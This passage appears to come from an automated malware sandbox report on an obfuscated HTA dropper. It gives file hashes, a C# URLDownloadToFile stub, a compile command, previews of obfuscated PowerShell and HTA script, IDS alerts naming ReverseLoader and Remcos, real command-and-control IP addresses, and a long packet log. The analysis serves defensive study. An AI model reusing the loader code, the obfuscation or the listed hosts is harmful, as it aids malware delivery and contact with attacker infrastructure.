                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                              Malicious:false
                                                                                                              Preview:..
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:MSVC .res
                                                                                                              Category:dropped
                                                                                                              Size (bytes):652
                                                                                                              Entropy (8bit):3.0923038887693326
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycoak7Ynqqn9PN5Dlq5J:+RI+ycuZhN2oakSn9PNnqX
                                                                                                              MD5:7C49BC6431D4D98CD68A17A0F7779D06
                                                                                                              SHA1:547E6ED90B614C5880A9A0B76AE3C2404AD0B60B
                                                                                                              SHA-256:304AE69299BA0C828D966F78A750254156182018E2FD1D83414102F5C1630AF8
                                                                                                              SHA-512:069DB293C59621BCD5BFF4FF5A4B0021615B7713DF9C46C603FD7A77120F7118DB4836DCFD978F8D3884DE7BF8B540D69B0DB556B04D6C2DE229626D1E6319D9
                                                                                                              Malicious:false
                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.1.d.f.4.a.c.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):475
                                                                                                              Entropy (8bit):3.6973410645091787
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:V/DsYLDS81zuJtk2mMmFFJQXReKJ8SRHy4Hgu+UYfJ6fdgFQy:V/DTLDfuJVXfH09K9y
                                                                                                              MD5:0C431E10CF228FE2C475697B04FF0EBB
                                                                                                              SHA1:04439E5D97E5C2E03F57CAF24564925B32D644CB
                                                                                                              SHA-256:F0514C83D3A0460E90E267FBB96546F4B5890906EB7EA94799C38EC743FB91AE
                                                                                                              SHA-512:954A57476DAA5408F0FF679972741E63E8FE61FF20BDEFC40B83AD6FF633B0A7D5D3DDCE7CFAFF0A5FF0BC2300704F6C5639ADBF44F38A818D22644814E5EFCB
                                                                                                              Malicious:false
                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace tdiNXtrg.{. public class YP. {. [DllImport("UrLMOn", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr rm,string BiIFqNkjl,string BFhsGR,uint HMJhhu,IntPtr xkB);.. }..}.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):369
                                                                                                              Entropy (8bit):5.236935345075532
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fvGlrGR0zxs7+AEszIwkn23fvGlrGrn:p37Lvkmb6KRfnGlrGWWZEifnGlrGr
                                                                                                              MD5:92A9E264434F47B7C70B73D6871B58A6
                                                                                                              SHA1:BC22F8E51015B2E0B5EF86515A6D7B08A88F0D27
                                                                                                              SHA-256:C3F23B0F6633CBCB1F9B34D6E49C20A8DF8219528760BEA14CF77DFBC0F9F097
                                                                                                              SHA-512:FA3A8B963B2342F4ECC9E6A4C72420F539CA913E1C1ED06BFC4447820EE794CAF0AD0E584C11E3F7F06B185245B833BD5F38A7D68726E977674507A719CAFEDF
                                                                                                              Malicious:true
                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.0.cs"
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):3072
                                                                                                              Entropy (8bit):2.813178194418042
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:etGSfPBu5exl8OlItkWWaNm6EtkZfDgmdcrwjcUWI+ycuZhN2oakSn9PNnq:6Ysx+Ol07NmoJDgmd4wA31ul2oa3nnq
                                                                                                              MD5:F0F1A327180C777E0DDEAD3BBBA7C2E9
                                                                                                              SHA1:FB57EAEED2C92D56E8DD4874B9F194E49C70860C
                                                                                                              SHA-256:FCCB8B5869FFEE8989CD8084252C8CAB4BCDDE67BE0886C7303E8C736A76FDE2
                                                                                                              SHA-512:7740BEB735AA53BF2D762EA4C68C231A7C78E395F0D33C4D1A4F23C35898D49988A551F41E16344D295CE320D4F5433959A2FD0BF46BB0E158CE9E841F7B901B
                                                                                                              Malicious:false
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................3.,.....q.....q.......................................... :.....P ......L.........R.....U....._.....f.....m...L.....L...!.L.....L.......!.....*.......:.......................................#..........<Module>.r1
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):867
                                                                                                              Entropy (8bit):5.309667439195098
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:KJBqd3ka6KRfnGlrGnEifnGlrGqKax5DqBVKVrdFAMBJTH:Cika6CnGJGnEunGJGqK2DcVKdBJj
                                                                                                              MD5:DA1BB970BD2878E8A2A1F8D25EFD2B3F
                                                                                                              SHA1:0FEF7564B215E1B43D540E6D28E7E88CFB0B9C00
                                                                                                              SHA-256:BD7426D8D70FA1C021EF57F98475C5ABA434E74347845579A5B73C1BB1421666
                                                                                                              SHA-512:40BF7D5F15BA989F3A5B8AC0253D053A3691EE76651DD69CADE03B9163FD3780CFA60C41ABEC53763BBBC5CCA9DD4A445A9791A4866A021982A4123457DE88A5
                                                                                                              Malicious:false
                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (3454), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):154352
                                                                                                              Entropy (8bit):3.8134053941949806
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:XNGVWmRC28eTt1DzYSyEgNGVWmRC28eTt1DzYSygNGVWmRC28eTt1DzYSy+:9q9t1DzYSKq9t1DzYSPq9t1DzYSN
                                                                                                              MD5:2E124153BE958647E84566B305ECF94E
                                                                                                              SHA1:D7D06FE6314EE8E4C31A971872632477EDE38248
                                                                                                              SHA-256:5B5835CEBCC79AE42D3EDC11DDCA5E2F6C4BF333E78D1B2D0733A091A9FD887E
                                                                                                              SHA-512:9BB7F048CFA817E406D63AFFC034EA89F7BEB6DD584521D5B1A531A032E22470BB9E9C8A12931B5838A77267ACF5FE64E8E788CAEE49C014348B75925614E450
                                                                                                              Malicious:true
                                                                                                              Preview:...... . . . .....N.g.p.H.G.G.o.p.q.f.z.b.u.I.i. .=. .".I.G.s.P.e.U.L.G.G.R.C.h.o.K.K.".....N.i.o.i.W.T.O.N.a.B.C.G.k.R.l. .=. .".q.W.G.k.Z.C.K.S.u.A.K.Z.H.C.C.".....s.L.k.q.r.P.L.L.W.P.d.O.L.z.A. .=. .".W.m.K.e.G.I.K.N.u.W.u.c.k.a.z.".........l.o.P.k.H.L.o.k.K.m.L.s.B.L.W. .=. .".i.U.W.K.i.p.L.I.K.t.u.i.p.W.N.".....A.i.U.u.K.n.k.d.b.K.R.L.P.L.u. .=. .".A.L.A.N.c.L.A.P.J.z.t.W.W.u.I.".....L.m.L.h.e.W.t.c.a.h.t.G.K.k.t. .=. .".R.C.Z.b.q.U.x.k.i.a.W.o.P.e.p.".....k.L.n.R.A.o.h.x.o.U.m.t.O.l.Q. .=. .".i.k.G.K.I.l.L.U.j.a.B.G.m.R.A.".....W.p.x.U.C.l.c.H.A.t.L.G.O.L.p. .=. .".j.C.P.u.R.o.c.B.S.W.G.o.W.i.K.".....Z.Z.W.c.G.i.f.I.O.o.x.s.O.u.G. .=. .".t.B.z.b.m.t.i.p.N.U.A.L.K.A.i.".....L.r.d.W.U.L.l.b.P.i.o.t.x.i.U. .=. .".L.W.I.A.x.L.L.i.m.c.a.L.P.A.t.".....p.k.Z.q.l.P.p.p.L.t.i.n.i.h.k. .=. .".p.L.k.t.b.C.U.L.L.P.L.d.p.G.A.".....l.Z.c.L.c.q.c.O.z.m.i.p.p.U.A. .=. .".G.x.G.H.W.C.T.z.x.Z.k.z.t.i.c.".....P.k.K.c.C.R.o.P.J.c.W.L.W.R.k. .=. .".N.W.h.t.N.b.p.U.x.R.O.b.a.x.q.".....o.S.d.K.b.J.Z.H.
                                                                                                              File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                                                              Entropy (8bit):2.6377005909084796
                                                                                                              TrID:
                                                                                                                File name:clearentirethingwithbestnoticetheeverythinggooodfrome.hta
                                                                                                                File size:147'751 bytes
                                                                                                                MD5:5215d83b478d7a718062863c5efbbeeb
                                                                                                                SHA1:9ac735295a8b3bc10740d50669f6fa5c81ae10ce
                                                                                                                SHA256:af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
                                                                                                                SHA512:b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
                                                                                                                SSDEEP:768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
                                                                                                                TLSH:BCE35027D5DB943C65E7BEBBF71CBF2B1183AD05EC8985CB095C4A900DD2A8E7234984
                                                                                                                File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-16T07:12:04.055751+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730192.3.122.15980TCP
                                                                                                                2024-12-16T07:12:32.099411+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449738172.67.187.200443TCP
                                                                                                                2024-12-16T07:12:32.511096+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11172.67.187.200443192.168.2.449738TCP
                                                                                                                2024-12-16T07:12:32.511096+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.67.187.200443192.168.2.449738TCP
                                                                                                                2024-12-16T07:12:33.462037+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.67.187.200443192.168.2.449738TCP
                                                                                                                2024-12-16T07:12:35.200213+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739107.173.143.3114646TCP
                                                                                                                2024-12-16T07:12:37.309488+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740107.173.143.3114646TCP
                                                                                                                2024-12-16T07:12:37.593144+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449741178.237.33.5080TCP
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 16, 2024 07:12:02.811033964 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:02.930974007 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:02.931102037 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:02.946059942 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:03.065874100 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055463076 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055512905 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055597067 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055632114 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055665016 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055717945 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055751085 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055751085 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.055751085 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.055785894 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055819035 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.055824995 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.055849075 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.055856943 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.057879925 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.176161051 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.176227093 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.181869984 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.248517036 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.248706102 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.248792887 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.248924971 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.251727104 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.251840115 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.251873970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.252224922 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.260248899 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.260600090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.260656118 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.261643887 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.268579006 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.268975019 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.269021988 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.272151947 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.276951075 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.277304888 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.277487040 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.281733990 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.285413027 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.285695076 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.292874098 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.294598103 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.294632912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.296175957 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.302129984 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.302310944 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.308300018 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.310544014 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.310652018 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.310858965 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.320061922 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.320261955 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.320445061 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.325134039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.328495979 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.328685045 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.328903913 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.328903913 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.440855980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.440948009 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.442655087 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.442831039 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.445159912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.445174932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.445245981 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.445246935 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.453457117 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.453531981 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.453648090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.453818083 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.461910009 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.462084055 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.462110996 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.462174892 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.470276117 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.470346928 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.470463037 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.470520020 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.477685928 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.477780104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.477786064 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.477865934 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.486062050 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.486115932 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.486179113 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.486227036 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.494472980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.494545937 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.494590044 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.494653940 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.502871037 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.502933979 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.503010988 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.503061056 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.511255980 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.511337042 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.511403084 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.511459112 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.517206907 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.517277002 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.517491102 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.517548084 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.523176908 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.523399115 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.523488045 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.523770094 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.529125929 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.529309034 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.529481888 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.529540062 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.535079002 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.535341978 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.535424948 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.535475016 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.541433096 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.541449070 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.541620970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.541620970 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.548093081 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.548127890 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.548170090 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.548171043 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.553953886 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.554016113 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.554128885 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.554186106 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.559957981 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.560034990 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.560076952 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.560129881 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.565912008 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.565979004 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.566049099 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.566099882 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.571787119 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.571851015 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.571929932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.571983099 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.576857090 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.576945066 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.633488894 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.633615971 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.633706093 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.633706093 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.636416912 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.636432886 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.636475086 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.636512995 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.641076088 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.641100883 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.641151905 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.641185999 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.646894932 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.646912098 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.647092104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.647092104 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.652596951 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.652677059 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.652698040 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.652756929 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.658463955 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.658555031 CET4973080192.168.2.4192.3.122.159
                                                                                                                Dec 16, 2024 07:12:04.658576012 CET8049730192.3.122.159192.168.2.4
                                                                                                                Dec 16, 2024 07:12:04.658644915 CET4973080192.168.2.4192.3.122.159
